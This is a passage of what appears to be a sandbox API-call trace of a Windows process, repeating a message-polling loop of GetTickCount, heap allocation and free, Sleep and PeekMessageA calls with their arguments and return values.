GetTickCount () returned 0x1d1fd [0066.392] GetTickCount () returned 0x1d1fd [0066.392] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.392] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.392] GetTickCount () returned 0x1d1fd [0066.392] Sleep (dwMilliseconds=0x0) [0066.392] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.392] GetLastError () returned 0x0 [0066.393] GetCurrentProcessId () returned 0xa44 [0066.393] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.393] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.393] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.393] GetTickCount () returned 0x1d1fd [0066.393] GetTickCount () returned 0x1d1fd [0066.393] GetTickCount () returned 0x1d1fd [0066.393] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.393] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.393] GetTickCount () returned 0x1d1fd [0066.393] Sleep (dwMilliseconds=0x0) [0066.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.393] GetLastError () returned 0x0 [0066.393] GetCurrentProcessId () returned 0xa44 [0066.393] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.393] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.393] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.394] GetTickCount () returned 0x1d1fd [0066.394] GetTickCount () returned 0x1d1fd [0066.394] GetTickCount () returned 0x1d1fd [0066.394] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.394] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.394] GetTickCount () returned 0x1d1fd [0066.394] Sleep (dwMilliseconds=0x0) [0066.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.394] GetLastError () returned 0x0 [0066.394] GetCurrentProcessId () returned 0xa44 [0066.394] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.394] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.394] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.394] GetTickCount () returned 0x1d1fd [0066.394] GetTickCount () returned 0x1d1fd [0066.394] GetTickCount () returned 0x1d1fd [0066.394] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.394] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.394] GetTickCount () returned 0x1d1fd [0066.395] Sleep (dwMilliseconds=0x0) [0066.395] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.395] GetLastError () returned 0x0 [0066.395] GetCurrentProcessId () returned 0xa44 [0066.395] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.395] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.395] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.395] GetTickCount () returned 0x1d1fd [0066.395] GetTickCount () returned 0x1d1fd [0066.395] GetTickCount () returned 0x1d1fd [0066.395] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.395] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.395] GetTickCount () returned 0x1d1fd [0066.395] Sleep (dwMilliseconds=0x0) [0066.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.396] GetLastError () returned 0x0 [0066.396] GetCurrentProcessId () returned 0xa44 [0066.396] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.396] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.396] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.396] GetTickCount () returned 0x1d1fd [0066.396] GetTickCount () returned 0x1d1fd [0066.396] GetTickCount () returned 0x1d1fd [0066.396] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.396] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.396] GetTickCount () returned 0x1d1fd [0066.396] Sleep (dwMilliseconds=0x0) [0066.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.396] GetLastError () returned 0x0 [0066.397] GetCurrentProcessId () returned 0xa44 [0066.397] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.397] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.397] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.397] GetTickCount () returned 0x1d1fd [0066.397] GetTickCount () returned 0x1d1fd [0066.397] GetTickCount () returned 0x1d1fd [0066.397] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.397] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.397] GetTickCount () returned 0x1d1fd [0066.397] Sleep (dwMilliseconds=0x0) [0066.397] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.397] GetLastError () returned 0x0 [0066.397] GetCurrentProcessId () returned 0xa44 [0066.397] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.397] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.397] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.398] GetTickCount () returned 0x1d1fd [0066.398] GetTickCount () returned 0x1d1fd [0066.398] GetTickCount () returned 0x1d1fd [0066.398] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.398] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.398] GetTickCount () returned 0x1d1fd [0066.398] Sleep (dwMilliseconds=0x0) [0066.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.398] GetLastError () returned 0x0 [0066.398] GetCurrentProcessId () returned 0xa44 [0066.398] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.398] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.398] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.398] GetTickCount () returned 0x1d20d [0066.398] GetTickCount () returned 0x1d20d [0066.399] GetTickCount () returned 0x1d20d [0066.399] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.399] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.399] GetTickCount () returned 0x1d20d [0066.399] Sleep (dwMilliseconds=0x0) [0066.399] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.399] GetLastError () returned 0x0 [0066.399] GetCurrentProcessId () returned 0xa44 [0066.399] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.399] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.399] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.399] GetTickCount () returned 0x1d20d [0066.399] GetTickCount () returned 0x1d20d [0066.399] GetTickCount () returned 0x1d20d [0066.399] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.399] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.399] GetTickCount () returned 0x1d20d [0066.400] Sleep (dwMilliseconds=0x0) [0066.400] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.400] GetLastError () returned 0x0 [0066.400] GetCurrentProcessId () returned 0xa44 [0066.400] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.400] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.400] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.400] GetTickCount () returned 0x1d20d [0066.400] GetTickCount () returned 0x1d20d [0066.400] GetTickCount () returned 0x1d20d [0066.400] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.400] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.400] GetTickCount () returned 0x1d20d [0066.400] Sleep (dwMilliseconds=0x0) [0066.401] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.401] GetLastError () returned 0x0 [0066.401] GetCurrentProcessId () returned 0xa44 [0066.401] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.401] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.401] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.401] GetTickCount () returned 0x1d20d [0066.401] GetTickCount () returned 0x1d20d [0066.401] GetTickCount () returned 0x1d20d [0066.401] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.401] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.401] GetTickCount () returned 0x1d20d [0066.401] Sleep (dwMilliseconds=0x0) [0066.401] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.401] GetLastError () returned 0x0 [0066.401] GetCurrentProcessId () returned 0xa44 [0066.401] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.402] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.402] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.402] GetTickCount () returned 0x1d20d [0066.402] GetTickCount () returned 0x1d20d [0066.402] GetTickCount () returned 0x1d20d [0066.402] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.402] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.402] GetTickCount () returned 0x1d20d [0066.402] Sleep (dwMilliseconds=0x0) [0066.402] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.402] GetLastError () returned 0x0 [0066.402] GetCurrentProcessId () returned 0xa44 [0066.402] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.402] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.402] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.402] GetTickCount () returned 0x1d20d [0066.402] GetTickCount () returned 0x1d20d [0066.403] GetTickCount () returned 0x1d20d [0066.403] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.403] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.403] GetTickCount () returned 0x1d20d [0066.403] Sleep (dwMilliseconds=0x0) [0066.403] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.403] GetLastError () returned 0x0 [0066.403] GetCurrentProcessId () returned 0xa44 [0066.403] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.403] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.403] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.403] GetTickCount () returned 0x1d20d [0066.403] GetTickCount () returned 0x1d20d [0066.403] GetTickCount () returned 0x1d20d [0066.403] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.403] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.403] GetTickCount () returned 0x1d20d [0066.404] Sleep (dwMilliseconds=0x0) [0066.404] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.404] GetLastError () returned 0x0 [0066.404] GetCurrentProcessId () returned 0xa44 [0066.404] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.404] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.404] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.404] GetTickCount () returned 0x1d20d [0066.404] GetTickCount () returned 0x1d20d [0066.404] GetTickCount () returned 0x1d20d [0066.404] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.404] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.404] GetTickCount () returned 0x1d20d [0066.405] Sleep (dwMilliseconds=0x0) [0066.405] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.405] GetLastError () returned 0x0 [0066.405] GetCurrentProcessId () returned 0xa44 [0066.405] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.405] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.405] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.405] GetTickCount () returned 0x1d20d [0066.405] GetTickCount () returned 0x1d20d [0066.405] GetTickCount () returned 0x1d20d [0066.405] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.405] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.405] GetTickCount () returned 0x1d20d [0066.405] Sleep (dwMilliseconds=0x0) [0066.405] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.405] GetLastError () returned 0x0 [0066.406] GetCurrentProcessId () returned 0xa44 [0066.406] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.406] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.406] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.406] GetTickCount () returned 0x1d20d [0066.406] GetTickCount () returned 0x1d20d [0066.406] GetTickCount () returned 0x1d20d [0066.406] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.406] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.406] GetTickCount () returned 0x1d20d [0066.406] Sleep (dwMilliseconds=0x0) [0066.406] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.406] GetLastError () returned 0x0 [0066.406] GetCurrentProcessId () returned 0xa44 [0066.406] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.407] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.407] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.407] GetTickCount () returned 0x1d20d [0066.407] GetTickCount () returned 0x1d20d [0066.407] GetTickCount () returned 0x1d20d [0066.407] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.407] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.407] GetTickCount () returned 0x1d20d [0066.407] Sleep (dwMilliseconds=0x0) [0066.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.407] GetLastError () returned 0x0 [0066.407] GetCurrentProcessId () returned 0xa44 [0066.407] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.407] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.407] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.407] GetTickCount () returned 0x1d20d [0066.407] GetTickCount () returned 0x1d20d [0066.408] GetTickCount () returned 0x1d20d [0066.408] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.408] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.408] GetTickCount () returned 0x1d20d [0066.408] Sleep (dwMilliseconds=0x0) [0066.408] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.408] GetLastError () returned 0x0 [0066.408] GetCurrentProcessId () returned 0xa44 [0066.408] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.408] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.408] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.408] GetTickCount () returned 0x1d20d [0066.408] GetTickCount () returned 0x1d20d [0066.408] GetTickCount () returned 0x1d20d [0066.408] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.408] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.409] GetTickCount () returned 0x1d20d [0066.409] Sleep (dwMilliseconds=0x0) [0066.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.409] GetLastError () returned 0x0 [0066.409] GetCurrentProcessId () returned 0xa44 [0066.409] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.409] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.409] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.409] GetTickCount () returned 0x1d20d [0066.409] GetTickCount () returned 0x1d20d [0066.409] GetTickCount () returned 0x1d20d [0066.409] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.409] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.409] GetTickCount () returned 0x1d20d [0066.410] Sleep (dwMilliseconds=0x0) [0066.410] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.410] GetLastError () returned 0x0 [0066.410] GetCurrentProcessId () returned 0xa44 [0066.410] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.410] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.410] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.410] GetTickCount () returned 0x1d21d [0066.410] GetTickCount () returned 0x1d21d [0066.410] GetTickCount () returned 0x1d21d [0066.410] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.410] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.410] GetTickCount () returned 0x1d21d [0066.410] Sleep (dwMilliseconds=0x0) [0066.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.411] GetLastError () returned 0x0 [0066.411] GetCurrentProcessId () returned 0xa44 [0066.411] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.411] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.411] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.411] GetTickCount () returned 0x1d21d [0066.411] GetTickCount () returned 0x1d21d [0066.411] GetTickCount () returned 0x1d21d [0066.411] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.411] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.411] GetTickCount () returned 0x1d21d [0066.411] Sleep (dwMilliseconds=0x0) [0066.411] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.411] GetLastError () returned 0x0 [0066.411] GetCurrentProcessId () returned 0xa44 [0066.411] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.411] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.411] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.411] GetTickCount () returned 0x1d21d [0066.411] GetTickCount () returned 0x1d21d [0066.411] GetTickCount () returned 0x1d21d [0066.412] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.412] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.412] GetTickCount () returned 0x1d21d [0066.412] Sleep (dwMilliseconds=0x0) [0066.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.412] GetLastError () returned 0x0 [0066.412] GetCurrentProcessId () returned 0xa44 [0066.412] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.412] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.412] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.412] GetTickCount () returned 0x1d21d [0066.412] GetTickCount () returned 0x1d21d [0066.412] GetTickCount () returned 0x1d21d [0066.412] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.412] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.412] GetTickCount () returned 0x1d21d [0066.412] Sleep (dwMilliseconds=0x0) [0066.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.412] GetLastError () returned 0x0 [0066.413] GetCurrentProcessId () returned 0xa44 [0066.413] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.413] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.413] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.413] GetTickCount () returned 0x1d21d [0066.413] GetTickCount () returned 0x1d21d [0066.413] GetTickCount () returned 0x1d21d [0066.413] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.413] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.413] GetTickCount () returned 0x1d21d [0066.413] Sleep (dwMilliseconds=0x0) [0066.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.413] GetLastError () returned 0x0 [0066.413] GetCurrentProcessId () returned 0xa44 [0066.413] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.413] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.413] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.413] GetTickCount () returned 0x1d21d [0066.413] GetTickCount () returned 0x1d21d [0066.413] GetTickCount () returned 0x1d21d [0066.413] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.413] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.413] GetTickCount () returned 0x1d21d [0066.414] Sleep (dwMilliseconds=0x0) [0066.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.414] GetLastError () returned 0x0 [0066.414] GetCurrentProcessId () returned 0xa44 [0066.414] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.414] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.414] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.414] GetTickCount () returned 0x1d21d [0066.414] GetTickCount () returned 0x1d21d 